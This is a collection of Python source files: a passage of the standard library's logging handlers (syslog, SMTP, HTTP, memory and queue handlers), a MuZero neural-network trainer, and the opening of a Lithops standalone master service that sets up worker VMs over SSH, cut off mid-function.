http://www.nightmare.com/squirl/python-ext/misc/syslog.py
Contributed by Nicolas Untz (after which minor refactoring changes
have been made).
"""
# from <linux/sys/syslog.h>:
# ======================================================================
# priorities/facilities are encoded into a single 32-bit quantity, where
# the bottom 3 bits are the priority (0-7) and the top 28 bits are the
# facility (0-big number). Both the priorities and the facilities map
# roughly one-to-one to strings in the syslogd(8) source code. This
# mapping is included in this file.
#
# priorities (these are ordered)
LOG_EMERG = 0 # system is unusable
LOG_ALERT = 1 # action must be taken immediately
LOG_CRIT = 2 # critical conditions
LOG_ERR = 3 # error conditions
LOG_WARNING = 4 # warning conditions
LOG_NOTICE = 5 # normal but significant condition
LOG_INFO = 6 # informational
LOG_DEBUG = 7 # debug-level messages
# facility codes
LOG_KERN = 0 # kernel messages
LOG_USER = 1 # random user-level messages
LOG_MAIL = 2 # mail system
LOG_DAEMON = 3 # system daemons
LOG_AUTH = 4 # security/authorization messages
LOG_SYSLOG = 5 # messages generated internally by syslogd
LOG_LPR = 6 # line printer subsystem
LOG_NEWS = 7 # network news subsystem
LOG_UUCP = 8 # UUCP subsystem
LOG_CRON = 9 # clock daemon
LOG_AUTHPRIV = 10 # security/authorization messages (private)
LOG_FTP = 11 # FTP daemon
LOG_NTP = 12 # NTP subsystem
LOG_SECURITY = 13 # Log audit
LOG_CONSOLE = 14 # Log alert
LOG_SOLCRON = 15 # Scheduling daemon (Solaris)
# other codes through 15 reserved for system use
LOG_LOCAL0 = 16 # reserved for local use
LOG_LOCAL1 = 17 # reserved for local use
LOG_LOCAL2 = 18 # reserved for local use
LOG_LOCAL3 = 19 # reserved for local use
LOG_LOCAL4 = 20 # reserved for local use
LOG_LOCAL5 = 21 # reserved for local use
LOG_LOCAL6 = 22 # reserved for local use
LOG_LOCAL7 = 23 # reserved for local use
priority_names = {
"alert": LOG_ALERT,
"crit": LOG_CRIT,
"critical": LOG_CRIT,
"debug": LOG_DEBUG,
"emerg": LOG_EMERG,
"err": LOG_ERR,
"error": LOG_ERR, # DEPRECATED
"info": LOG_INFO,
"notice": LOG_NOTICE,
"panic": LOG_EMERG, # DEPRECATED
"warn": LOG_WARNING, # DEPRECATED
"warning": LOG_WARNING,
}
facility_names = {
"auth": LOG_AUTH,
"authpriv": LOG_AUTHPRIV,
"console": LOG_CONSOLE,
"cron": LOG_CRON,
"daemon": LOG_DAEMON,
"ftp": LOG_FTP,
"kern": LOG_KERN,
"lpr": LOG_LPR,
"mail": LOG_MAIL,
"news": LOG_NEWS,
"ntp": LOG_NTP,
"security": LOG_SECURITY,
"solaris-cron": LOG_SOLCRON,
"syslog": LOG_SYSLOG,
"user": LOG_USER,
"uucp": LOG_UUCP,
"local0": LOG_LOCAL0,
"local1": LOG_LOCAL1,
"local2": LOG_LOCAL2,
"local3": LOG_LOCAL3,
"local4": LOG_LOCAL4,
"local5": LOG_LOCAL5,
"local6": LOG_LOCAL6,
"local7": LOG_LOCAL7,
}
#The map below appears to be trivially lowercasing the key. However,
#there's more to it than meets the eye - in some locales, lowercasing
#gives unexpected results. See SF #1524081: in the Turkish locale,
#"INFO".lower() != "info"
priority_map = {
"DEBUG" : "debug",
"INFO" : "info",
"WARNING" : "warning",
"ERROR" : "error",
"CRITICAL" : "critical"
}
def __init__(self, address=('localhost', SYSLOG_UDP_PORT),
facility=LOG_USER, socktype=None):
"""
Initialize a handler.
If address is specified as a string, a UNIX socket is used. To log to a
local syslogd, "SysLogHandler(address="/dev/log")" can be used.
If facility is not specified, LOG_USER is used. If socktype is
specified as socket.SOCK_DGRAM or socket.SOCK_STREAM, that specific
socket type will be used. For Unix sockets, you can also specify a
socktype of None, in which case socket.SOCK_DGRAM will be used, falling
back to socket.SOCK_STREAM.
"""
logging.Handler.__init__(self)
self.address = address
self.facility = facility
self.socktype = socktype
self.socket = None
self.createSocket()
def _connect_unixsocket(self, address):
use_socktype = self.socktype
if use_socktype is None:
use_socktype = socket.SOCK_DGRAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except OSError:
self.socket.close()
if self.socktype is not None:
# user didn't specify falling back, so fail
raise
use_socktype = socket.SOCK_STREAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except OSError:
self.socket.close()
raise
def createSocket(self):
address = self.address
socktype = self.socktype
if isinstance(address, str):
self.unixsocket = True
# Syslog server may be unavailable during handler initialisation.
# C's openlog() function also ignores connection errors.
# Moreover, we ignore these errors while logging, so it not worse
# to ignore it also here.
try:
self._connect_unixsocket(address)
except OSError:
pass
else:
self.unixsocket = False
if socktype is None:
socktype = socket.SOCK_DGRAM
host, port = address
ress = socket.getaddrinfo(host, port, 0, socktype)
if not ress:
raise OSError("getaddrinfo returns an empty list")
for res in ress:
af, socktype, proto, _, sa = res
err = sock = None
try:
sock = socket.socket(af, socktype, proto)
if socktype == socket.SOCK_STREAM:
sock.connect(sa)
break
except OSError as exc:
err = exc
if sock is not None:
sock.close()
if err is not None:
raise err
self.socket = sock
self.socktype = socktype
def encodePriority(self, facility, priority):
"""
Encode the facility and priority. You can pass in strings or
integers - if strings are passed, the facility_names and
priority_names mapping dictionaries are used to convert them to
integers.
"""
if isinstance(facility, str):
facility = self.facility_names[facility]
if isinstance(priority, str):
priority = self.priority_names[priority]
return (facility << 3) | priority
def close(self):
"""
Closes the socket.
"""
self.acquire()
try:
sock = self.socket
if sock:
self.socket = None
sock.close()
logging.Handler.close(self)
finally:
self.release()
def mapPriority(self, levelName):
"""
Map a logging level name to a key in the priority_names map.
This is useful in two scenarios: when custom levels are being
used, and in the case where you can't do a straightforward
mapping by lowercasing the logging level name because of locale-
specific issues (see SF #1524081).
"""
return self.priority_map.get(levelName, "warning")
ident = '' # prepended to all messages
append_nul = True # some old syslog daemons expect a NUL terminator
def emit(self, record):
"""
Emit a record.
The record is formatted, and then sent to the syslog server. If
exception information is present, it is NOT sent to the server.
"""
try:
msg = self.format(record)
if self.ident:
msg = self.ident + msg
if self.append_nul:
msg += '\000'
# We need to convert record level to lowercase, maybe this will
# change in the future.
prio = '<%d>' % self.encodePriority(self.facility,
self.mapPriority(record.levelname))
prio = prio.encode('utf-8')
# Message is a string. Convert to bytes as required by RFC 5424
msg = msg.encode('utf-8')
msg = prio + msg
if not self.socket:
self.createSocket()
if self.unixsocket:
try:
self.socket.send(msg)
except OSError:
self.socket.close()
self._connect_unixsocket(self.address)
self.socket.send(msg)
elif self.socktype == socket.SOCK_DGRAM:
self.socket.sendto(msg, self.address)
else:
self.socket.sendall(msg)
except Exception:
self.handleError(record)
class SMTPHandler(logging.Handler):
"""
A handler class which sends an SMTP email for each logging event.
"""
def __init__(self, mailhost, fromaddr, toaddrs, subject,
credentials=None, secure=None, timeout=5.0):
"""
Initialize the handler.
Initialize the instance with the from and to addresses and subject
line of the email. To specify a non-standard SMTP port, use the
(host, port) tuple format for the mailhost argument. To specify
authentication credentials, supply a (username, password) tuple
for the credentials argument. To specify the use of a secure
protocol (TLS), pass in a tuple for the secure argument. This will
only be used when authentication credentials are supplied. The tuple
will be either an empty tuple, or a single-value tuple with the name
of a keyfile, or a 2-value tuple with the names of the keyfile and
certificate file. (This tuple is passed to the `starttls` method).
A timeout in seconds can be specified for the SMTP connection (the
default is one second).
"""
logging.Handler.__init__(self)
if isinstance(mailhost, (list, tuple)):
self.mailhost, self.mailport = mailhost
else:
self.mailhost, self.mailport = mailhost, None
if isinstance(credentials, (list, tuple)):
self.username, self.password = credentials
else:
self.username = None
self.fromaddr = fromaddr
if isinstance(toaddrs, str):
toaddrs = [toaddrs]
self.toaddrs = toaddrs
self.subject = subject
self.secure = secure
self.timeout = timeout
def getSubject(self, record):
"""
Determine the subject for the email.
If you want to specify a subject line which is record-dependent,
override this method.
"""
return self.subject
def emit(self, record):
"""
Emit a record.
Format the record and send it to the specified addressees.
"""
try:
import smtplib
from email.message import EmailMessage
import email.utils
port = self.mailport
if not port:
port = smtplib.SMTP_PORT
smtp = smtplib.SMTP(self.mailhost, port, timeout=self.timeout)
msg = EmailMessage()
msg['From'] = self.fromaddr
msg['To'] = ','.join(self.toaddrs)
msg['Subject'] = self.getSubject(record)
msg['Date'] = email.utils.localtime()
msg.set_content(self.format(record))
if self.username:
if self.secure is not None:
smtp.ehlo()
smtp.starttls(*self.secure)
smtp.ehlo()
smtp.login(self.username, self.password)
smtp.send_message(msg)
smtp.quit()
except Exception:
self.handleError(record)
class NTEventLogHandler(logging.Handler):
"""
A handler class which sends events to the NT Event Log. Adds a
registry entry for the specified application name. If no dllname is
provided, win32service.pyd (which contains some basic message
placeholders) is used. Note that use of these placeholders will make
your event logs big, as the entire message source is held in the log.
If you want slimmer logs, you have to pass in the name of your own DLL
which contains the message definitions you want to use in the event log.
"""
def __init__(self, appname, dllname=None, logtype="Application"):
logging.Handler.__init__(self)
try:
import win32evtlogutil, win32evtlog
self.appname = appname
self._welu = win32evtlogutil
if not dllname:
dllname = os.path.split(self._welu.__file__)
dllname = os.path.split(dllname[0])
dllname = os.path.join(dllname[0], r'win32service.pyd')
self.dllname = dllname
self.logtype = logtype
self._welu.AddSourceToRegistry(appname, dllname, logtype)
self.deftype = win32evtlog.EVENTLOG_ERROR_TYPE
self.typemap = {
logging.DEBUG : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.INFO : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.WARNING : win32evtlog.EVENTLOG_WARNING_TYPE,
logging.ERROR : win32evtlog.EVENTLOG_ERROR_TYPE,
logging.CRITICAL: win32evtlog.EVENTLOG_ERROR_TYPE,
}
except ImportError:
print("The Python Win32 extensions for NT (service, event "\
"logging) appear not to be available.")
self._welu = None
def getMessageID(self, record):
"""
Return the message ID for the event record. If you are using your
own messages, you could do this by having the msg passed to the
logger being an ID rather than a formatting string. Then, in here,
you could use a dictionary lookup to get the message ID. This
version returns 1, which is the base message ID in win32service.pyd.
"""
return 1
def getEventCategory(self, record):
"""
Return the event category for the record.
Override this if you want to specify your own categories. This version
returns 0.
"""
return 0
def getEventType(self, record):
"""
Return the event type for the record.
Override this if you want to specify your own types. This version does
a mapping using the handler's typemap attribute, which is set up in
__init__() to a dictionary which contains mappings for DEBUG, INFO,
WARNING, ERROR and CRITICAL. If you are using your own levels you will
either need to override this method or place a suitable dictionary in
the handler's typemap attribute.
"""
return self.typemap.get(record.levelno, self.deftype)
def emit(self, record):
"""
Emit a record.
Determine the message ID, event category and event type. Then
log the message in the NT event log.
"""
if self._welu:
try:
id = self.getMessageID(record)
cat = self.getEventCategory(record)
type = self.getEventType(record)
msg = self.format(record)
self._welu.ReportEvent(self.appname, id, cat, type, [msg])
except Exception:
self.handleError(record)
def close(self):
"""
Clean up this handler.
You can remove the application name from the registry as a
source of event log entries. However, if you do this, you will
not be able to see the events as you intended in the Event Log
Viewer - it needs to be able to access the registry to get the
DLL name.
"""
#self._welu.RemoveSourceFromRegistry(self.appname, self.logtype)
logging.Handler.close(self)
class HTTPHandler(logging.Handler):
"""
A class which sends records to a web server, using either GET or
POST semantics.
"""
def __init__(self, host, url, method="GET", secure=False, credentials=None,
context=None):
"""
Initialize the instance with the host, the request URL, and the method
("GET" or "POST")
"""
logging.Handler.__init__(self)
method = method.upper()
if method not in ["GET", "POST"]:
raise ValueError("method must be GET or POST")
if not secure and context is not None:
raise ValueError("context parameter only makes sense "
"with secure=True")
self.host = host
self.url = url
self.method = method
self.secure = secure
self.credentials = credentials
self.context = context
def mapLogRecord(self, record):
"""
Default implementation of mapping the log record into a dict
that is sent as the CGI data. Overwrite in your class.
Contributed by Franz Glasner.
"""
return record.__dict__
def getConnection(self, host, secure):
"""
get a HTTP[S]Connection.
Override when a custom connection is required, for example if
there is a proxy.
"""
import http.client
if secure:
connection = http.client.HTTPSConnection(host, context=self.context)
else:
connection = http.client.HTTPConnection(host)
return connection
def emit(self, record):
"""
Emit a record.
Send the record to the web server as a percent-encoded dictionary
"""
try:
import urllib.parse
host = self.host
h = self.getConnection(host, self.secure)
url = self.url
data = urllib.parse.urlencode(self.mapLogRecord(record))
if self.method == "GET":
if (url.find('?') >= 0):
sep = '&'
else:
sep = '?'
url = url + "%c%s" % (sep, data)
h.putrequest(self.method, url)
# support multiple hosts on one IP address...
# need to strip optional :port from host, if present
i = host.find(":")
if i >= 0:
host = host[:i]
# See issue #30904: putrequest call above already adds this header
# on Python 3.x.
# h.putheader("Host", host)
if self.method == "POST":
h.putheader("Content-type",
"application/x-www-form-urlencoded")
h.putheader("Content-length", str(len(data)))
if self.credentials:
import base64
s = ('%s:%s' % self.credentials).encode('utf-8')
s = 'Basic ' + base64.b64encode(s).strip().decode('ascii')
h.putheader('Authorization', s)
h.endheaders()
if self.method == "POST":
h.send(data.encode('utf-8'))
h.getresponse() #can't do anything with the result
except Exception:
self.handleError(record)
class BufferingHandler(logging.Handler):
"""
A handler class which buffers logging records in memory. Whenever each
record is added to the buffer, a check is made to see if the buffer should
be flushed. If it should, then flush() is expected to do what's needed.
"""
def __init__(self, capacity):
"""
Initialize the handler with the buffer size.
"""
logging.Handler.__init__(self)
self.capacity = capacity
self.buffer = []
def shouldFlush(self, record):
"""
Should the handler flush its buffer?
Returns true if the buffer is up to capacity. This method can be
overridden to implement custom flushing strategies.
"""
return (len(self.buffer) >= self.capacity)
def emit(self, record):
"""
Emit a record.
Append the record. If shouldFlush() tells us to, call flush() to process
the buffer.
"""
self.buffer.append(record)
if self.shouldFlush(record):
self.flush()
def flush(self):
"""
Override to implement custom flushing behaviour.
This version just zaps the buffer to empty.
"""
self.acquire()
try:
self.buffer.clear()
finally:
self.release()
def close(self):
"""
Close the handler.
This version just flushes and chains to the parent class' close().
"""
try:
self.flush()
finally:
logging.Handler.close(self)
class MemoryHandler(BufferingHandler):
"""
A handler class which buffers logging records in memory, periodically
flushing them to a target handler. Flushing occurs whenever the buffer
is full, or when an event of a certain severity or greater is seen.
"""
def __init__(self, capacity, flushLevel=logging.ERROR, target=None,
flushOnClose=True):
"""
Initialize the handler with the buffer size, the level at which
flushing should occur and an optional target.
Note that without a target being set either here or via setTarget(),
a MemoryHandler is no use to anyone!
The ``flushOnClose`` argument is ``True`` for backward compatibility
reasons - the old behaviour is that when the handler is closed, the
buffer is flushed, even if the flush level hasn't been exceeded nor the
capacity exceeded. To prevent this, set ``flushOnClose`` to ``False``.
"""
BufferingHandler.__init__(self, capacity)
self.flushLevel = flushLevel
self.target = target
# See Issue #26559 for why this has been added
self.flushOnClose = flushOnClose
def shouldFlush(self, record):
"""
Check for buffer full or a record at the flushLevel or higher.
"""
return (len(self.buffer) >= self.capacity) or \
(record.levelno >= self.flushLevel)
def setTarget(self, target):
"""
Set the target handler for this handler.
"""
self.acquire()
try:
self.target = target
finally:
self.release()
def flush(self):
"""
For a MemoryHandler, flushing means just sending the buffered
records to the target, if there is one. Override if you want
different behaviour.
The record buffer is also cleared by this operation.
"""
self.acquire()
try:
if self.target:
for record in self.buffer:
self.target.handle(record)
self.buffer.clear()
finally:
self.release()
def close(self):
"""
Flush, if appropriately configured, set the target to None and lose the
buffer.
"""
try:
if self.flushOnClose:
self.flush()
finally:
self.acquire()
try:
self.target = None
BufferingHandler.close(self)
finally:
self.release()
class QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
with a multiprocessing Queue to centralise logging to file in one process
(in a multi-process application), so as to avoid file write contention
between processes.
This code is new in Python 3.2, but this class can be copy pasted into
user code for use with earlier Python versions.
"""
def __init__(self, queue):
"""
Initialise an instance, using the passed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses put_nowait. You may want to override
this method if you want to use blocking, timeouts or custom queue
implementations.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepare a record for queuing. The object returned by this method is
enqueued.
The base implementation formats the record to merge the message and
arguments, and removes unpickleable items from the record in-place.
Specifically, it overwrites the record's `msg` and
`message` attributes with the merged message (obtained by
calling the handler's `format` method), and sets the `args`,
`exc_info` and `exc_text` attributes to None.
You might want to override this method if you want to convert
the record to a dict or JSON string, or send a modified copy
of the record while leaving the original intact.
"""
# The format operation gets traceback text into record.exc_text
# (if there's exception data), and also returns the formatted
# message. We can then use this to replace the original
# msg + args, as these might be unpickleable. We also zap the
# exc_info and exc_text attributes, as they are no longer
# needed and, if not None, will typically not be pickleable.
msg = self.format(record)
# bpo-35726: make copy of record to avoid affecting other handlers in the chain.
record = copy.copy(record)
record.message = msg
record.msg = msg
record.args = None
record.exc_info = None
record.exc_text = None
return record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
"""
try:
self.enqueue(self.prepare(record))
except Exception:
self.handleError(record)
class QueueListener(object):
"""
This class implements an internal threaded listener which watches for
LogRecords being added to a queue, removes them and passes them to a
list of handlers for processing.
"""
_sentinel = None
def __init__(self, queue, *handlers, respect_handler_level=False):
"""
Initialise an instance with the specified queue and
handlers.
"""
self.queue = queue
self.handlers = handlers
self._thread = None
self.respect_handler_level = respect_handler_level
def dequeue(self, block):
"""
Dequeue a record and return it, optionally blocking.
The base implementation uses get. You may want to override this method
if you want to use timeouts or work with custom queue implementations.
"""
return self.queue.get(block)
def start(self):
"""
Start the listener.
This starts up a background thread to monitor the queue for
LogRecords to process.
"""
self._thread = t = threading.Thread(target=self._monitor)
t.daemon = True
t.start()
def prepare(self, record):
"""
Prepare a record for handling.
This method just returns the passed-in record. You may want to
override this method if you need to do any custom marshalling or
manipulation of the record before passing it to the handlers.
"""
return record
def handle(self, record):
"""
Handle a record.
This just loops through the handlers offering them the record
to handle.
"""
record = self.prepare(record)
for handler in self.handlers:
if not self.respect_handler_level:
process = True
else:
process = record.levelno >= handler.level
if process:
handler.handle(record)
def _monitor(self):
"""
Monitor the queue for records, and ask the handler
to deal with them.
This method runs on a separate, internal thread.
The thread will terminate if it sees a sentinel object in the queue.
"""
q = self.queue
has_task_done = hasattr(q, 'task_done')
while True:
try:
record = self.dequeue(True)
if record is self._sentinel:
if has_task_done:
q.task_done()
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
break
def enqueue_sentinel(self):
"""
This is used to enqueue the sentinel record.
The base implementation uses put_nowait. You may want to override this
method if you want to use timeouts or work with custom queue
implementations.
"""
self.queue.put_nowait(self._sentinel)
def stop(self):
"""
Stop the listener.
This asks the thread to terminate, and then waits for it to do so.
Note that if you don't call this before your application exits, there
may be some records still left on the queue, which won't be processed.
"""
self.enqueue_sentinel()
self._thread.join()
self._thread = None
|
trainer.py
|
import time
from games.base_classes import MuZeroConfigBase
from threading import Thread
from torch.utils.tensorboard import SummaryWriter
import numpy
import torch
import models
class Trainer:
"""
Class which run in a dedicated thread to train a neural network and save it in the shared storage.
"""
def __init__(self, initial_weights, config):
self.config: MuZeroConfigBase = config
self.training_step = 0
self.writer = SummaryWriter(self.config.results_path / "trainer")
# Initialize the network
self.model = models.MuZeroExtendedNetwork(
self.config.observation_shape,
len(self.config.action_space),
self.config.encoding_size,
self.config.hidden_size,
)
self.model.set_weights(initial_weights)
self.model.to(torch.device(config.training_device))
self.model.train()
self.optimizer = torch.optim.SGD(
self.model.parameters(),
lr=self.config.lr_init,
momentum=self.config.momentum,
weight_decay=self.config.weight_decay,
)
def async_put_weights():
last_idx = None
while True:
if self.config.q_weights.empty():
if self.training_step != last_idx:
weights = self.model.get_weights()
last_idx = self.training_step
self.config.q_weights.put(weights)
else:
time.sleep(0.1)
Thread(target=async_put_weights).start()
self.continuous_update_weights()
def continuous_update_weights(self):
# Wait for the replay buffer to be filled
while self.config.v_self_play_count.value < 1:
time.sleep(1)
# Training loop
while True:
batch = self.config.q_replay_batch.get()
total_loss, value_loss, reward_loss, policy_loss = self.update_weights(
batch
)
# Save to the shared storage
if self.training_step % self.config.checkpoint_interval == 0:
self.config.q_weights.put(self.model.get_weights())
self.config.v_training_step.value = self.training_step
self.writer.add_scalar(
"2.Workers/Training steps", self.training_step, self.training_step
)
self.writer.add_scalar(
"3.Loss/1.Total loss", total_loss, self.training_step
)
self.writer.add_scalar("3.Loss/Value loss", value_loss, self.training_step)
self.writer.add_scalar(
"3.Loss/Reward loss", reward_loss, self.training_step
)
self.writer.add_scalar(
"3.Loss/Policy loss", policy_loss, self.training_step
)
if self.config.training_delay:
time.sleep(self.config.training_delay)
def update_weights(self, batch):
"""
Perform one training step.
"""
self.update_lr()
(
observation_batch,
action_batch,
target_value,
target_reward,
target_policy,
) = batch
device = next(self.model.parameters()).device
observation_batch = torch.tensor(observation_batch).float().to(device)
action_batch = torch.tensor(action_batch).float().to(device).unsqueeze(-1)
target_value = torch.tensor(target_value).float().to(device)
target_reward = torch.tensor(target_reward).float().to(device)
target_policy = torch.tensor(target_policy).float().to(device)
value, reward, policy_logits, hidden_state = self.model.initial_inference(
observation_batch
)
predictions = [(value, reward, policy_logits)]
for action_i in range(self.config.num_unroll_steps):
value, reward, policy_logits, hidden_state = self.model.recurrent_inference(
# todo : check here! can we set previous_actions with empty list?
hidden_state, action_batch[:, action_i], []
)
predictions.append((value, reward, policy_logits))
# Compute losses
value_loss, reward_loss, policy_loss = (0, 0, 0)
for i, prediction in enumerate(predictions):
value, reward, policy_logits = prediction
(
current_value_loss,
current_reward_loss,
current_policy_loss,
) = loss_function(
value.squeeze(-1),
reward.squeeze(-1),
policy_logits,
target_value[:, i],
target_reward[:, i],
target_policy[:, i, :],
)
value_loss += current_value_loss
reward_loss += current_reward_loss
policy_loss += current_policy_loss
loss = (value_loss + reward_loss + policy_loss).mean()
# Scale gradient by number of unroll steps (See paper Training appendix)
loss.register_hook(lambda grad: grad * 1 / self.config.num_unroll_steps)
# Optimize
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
self.training_step += 1
return (
loss.item(),
value_loss.mean().item(),
reward_loss.mean().item(),
policy_loss.mean().item(),
)
def update_lr(self):
"""
Update learning rate
"""
lr = self.config.lr_init * self.config.lr_decay_rate ** (
self.training_step / self.config.lr_decay_steps
)
for param_group in self.optimizer.param_groups:
param_group["lr"] = lr
def loss_function(value, reward, policy_logits, target_value, target_reward, target_policy):
# TODO: paper promotes cross entropy instead of MSE
value_loss = torch.nn.MSELoss()(value, target_value)
reward_loss = torch.nn.MSELoss()(reward, target_reward)
policy_loss = torch.mean(torch.sum(-target_policy * torch.nn.LogSoftmax(dim=1)(policy_logits), 1))
return value_loss, reward_loss, policy_loss
|
master.py
|
#
# Copyright Cloudlab URV 2020
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import copy
import time
import json
import uuid
import flask
import queue
import logging
import multiprocessing as mp
from pathlib import Path
from gevent.pywsgi import WSGIServer
from concurrent.futures import ThreadPoolExecutor
from lithops.constants import LITHOPS_TEMP_DIR, STANDALONE_LOG_FILE, JOBS_DIR,\
STANDALONE_SERVICE_PORT, STANDALONE_CONFIG_FILE, STANDALONE_INSTALL_DIR
from lithops.localhost.localhost import LocalhostHandler
from lithops.utils import verify_runtime_name, iterchunks, setup_lithops_logger
from lithops.standalone.utils import get_worker_setup_script
from lithops.standalone.keeper import BudgetKeeper
setup_lithops_logger(logging.DEBUG, filename=STANDALONE_LOG_FILE)
logger = logging.getLogger('lithops.standalone.master')
app = flask.Flask(__name__)
INSTANCE_START_TIMEOUT = 200
MAX_INSTANCE_CREATE_RETRIES = 3
STANDALONE_CONFIG = None
STANDALONE_HANDLER = None
BUDGET_KEEPER = None
JOB_PROCESSES = {}
WORK_QUEUES = {}
MASTER_IP = None
MP_MANAGER = mp.Manager()
LOCALHOST_MANAGER_PROCESS = None
EXEC_MODE = 'consume'
WORKERS = MP_MANAGER.list()
def is_worker_instance_ready(vm):
"""
Checks if the VM instance is ready to receive ssh connections
"""
try:
vm.get_ssh_client().run_remote_command('id')
except Exception as e:
logger.debug('ssh to {} failed: {}'
.format(vm.ip_address, e))
vm.del_ssh_client()
return False
return True
def wait_worker_instance_ready(vm):
"""
Waits until the VM instance is ready to receive ssh connections
"""
logger.info('Waiting {} to become ready'.format(vm))
start = time.time()
while(time.time() - start < INSTANCE_START_TIMEOUT):
if is_worker_instance_ready(vm):
logger.info('{} ready in {} seconds'
.format(vm, round(time.time()-start, 2)))
return True
time.sleep(5)
msg = 'Readiness probe expired on {}'.format(vm)
logger.error(msg)
raise TimeoutError(msg)
def setup_worker(worker_info, work_queue, job_key, workers):
"""
Run worker process
Install all the Lithops dependencies into the worker.
Runs the job
"""
instance_name, ip_address, instance_id, ssh_credentials = worker_info
logger.info('Starting setup for VM instance {}'.format(instance_name))
vm = STANDALONE_HANDLER.backend.get_vm(instance_name)
vm.ip_address = ip_address
vm.instance_id = instance_id
vm.ssh_credentials = ssh_credentials
worker_ready = False
retry = 0
logger.info('Queue empty: {} - Queue size: {}'
.format(work_queue.empty(), work_queue.qsize()))
while(not worker_ready and not work_queue.empty()
and retry < MAX_INSTANCE_CREATE_RETRIES):
try:
wait_worker_instance_ready(vm)
worker_ready = True
except TimeoutError: # VM not started in time
if retry == MAX_INSTANCE_CREATE_RETRIES:
msg = '{} readiness probe failed after {} retries.'.format(vm, retry)
logger.debug(msg)
raise Exception(msg)
logger.info('Recreating VM instance {}'.format(vm.name))
retry += 1
vm.delete()
vm.create()
if work_queue.empty():
logger.info('Work queue is already empty. Skipping {}'.format(vm))
return
# upload zip lithops package
logger.info('Uploading lithops files to {}'.format(vm))
vm.get_ssh_client().upload_local_file('/opt/lithops/lithops_standalone.zip',
'/tmp/lithops_standalone.zip')
logger.info('Executing lithops installation process on {}'.format(vm))
vm_data = {'instance_name': vm.name,
'ip_address': vm.ip_address,
'instance_id': vm.instance_id,
'master_ip': MASTER_IP,
'job_key': job_key}
script = get_worker_setup_script(STANDALONE_CONFIG, vm_data)
vm.get_ssh_client().run_remote_command(script, run_async=True)
vm.del_ssh_client()
logger.info('Installation script submitted to {}'.format(vm))
logger.debug(f'Appending to WORKERS {vm_data}')
workers.append(vm_data)
def stop_job_process(job_key):
"""
Stops a job process
"""
global JOB_PROCESSES
done = os.path.join(JOBS_DIR, job_key+'.done')
Path(done).touch()
if job_key in JOB_PROCESSES and JOB_PROCESSES[job_key].is_alive():
JOB_PROCESSES[job_key].terminate()
logger.info('Finished job {} invocation'.format(job_key))
del JOB_PROCESSES[job_key]
def run_job_local(work_queue):
"""
Localhost jobs manager process for consume mode
"""
pull_runtime = STANDALONE_CONFIG.get('pull_runtime', False)
try:
localhos_handler = LocalhostHandler({'pull_runtime': pull_runtime})
while True:
job_payload = work_queue.get()
job_payload['config']['lithops']['backend'] = 'localhost'
localhos_handler.invoke(job_payload)
except Exception as e:
logger.error(e)
def run_job_worker(job_payload, work_queue, workers_list):
"""
Process responsible to wait for workers to become ready, and
submit individual tasks of the job to them
"""
job_key = job_payload['job_key']
call_ids = job_payload['call_ids']
chunksize = job_payload['chunksize']
workers = job_payload['worker_instances']
for call_ids_range in iterchunks(call_ids, chunksize):
task_payload = copy.deepcopy(job_payload)
dbr = task_payload['data_byte_ranges']
task_payload['call_ids'] = call_ids_range
task_payload['data_byte_ranges'] = [dbr[int(call_id)] for call_id in call_ids_range]
work_queue.put(task_payload)
logger.info("Total tasks in {} work queue: {}".format(job_key, work_queue.qsize()))
# run setup only in case not reusing old workers
if workers:
with ThreadPoolExecutor(len(workers)) as executor:
for worker_info in workers:
executor.submit(setup_worker, worker_info, work_queue, job_key, workers_list)
logger.info('All workers set up for job {}'.format(job_key))
while not work_queue.empty():
time.sleep(1)
done = os.path.join(JOBS_DIR, job_key+'.done')
Path(done).touch()
logger.info('Finished job {} invocation.'.format(job_key))
def error(msg):
response = flask.jsonify({'error': msg})
response.status_code = 404
return response
@app.route('/workers', methods=['GET'])
def get_workers():
"""
Returns the number of spawned workers
Currently returns only spawned workers metadata
TODO - add support to list only available workers when each worker updates itself in WORKERS via POST
TODO - job.done for master is not same as job.done for worker, can be improved by touch on master from worker instead of touch on master
"""
logger.debug(f'in get_workers, workers = {WORKERS}')
workers = []
for w in WORKERS:
vm = STANDALONE_HANDLER.backend.get_vm(w['instance_name'])
vm.ip_address = w['ip_address']
vm.instance_id = w['instance_id']
if is_worker_instance_ready(vm):
workers.append(w)
else:
# delete worker in case it is not available. may cover edge cases when for some reason keeper not started on worker
vm.delete()
response = flask.jsonify(workers)
response.status_code = 200
return response
@app.route('/get-task/<job_key>', methods=['GET'])
def get_task(job_key):
"""
Returns a task from the work queue
"""
global WORK_QUEUES
global JOB_PROCESSES
try:
task_payload = WORK_QUEUES.setdefault(job_key, MP_MANAGER.Queue()).get(timeout=0.1)
response = flask.jsonify(task_payload)
response.status_code = 200
logger.info('Calls {} invoked on {}'
.format(', '.join(task_payload['call_ids']),
flask.request.remote_addr))
except queue.Empty:
if EXEC_MODE != 'reuse':
stop_job_process(job_key)
response = ('', 204)
return response
@app.route('/clear', methods=['POST'])
def clear():
"""
Stops received job processes
"""
global JOB_PROCESSES
job_key_list = flask.request.get_json(force=True, silent=True)
for job_key in job_key_list:
if job_key in JOB_PROCESSES and JOB_PROCESSES[job_key].is_alive():
logger.info('Received SIGTERM: Stopping job process {}'
.format(job_key))
stop_job_process(job_key)
return ('', 204)
@app.route('/run', methods=['POST'])
def run():
"""
Run a job locally, in consume mode
"""
global BUDGET_KEEPER
global WORK_QUEUES
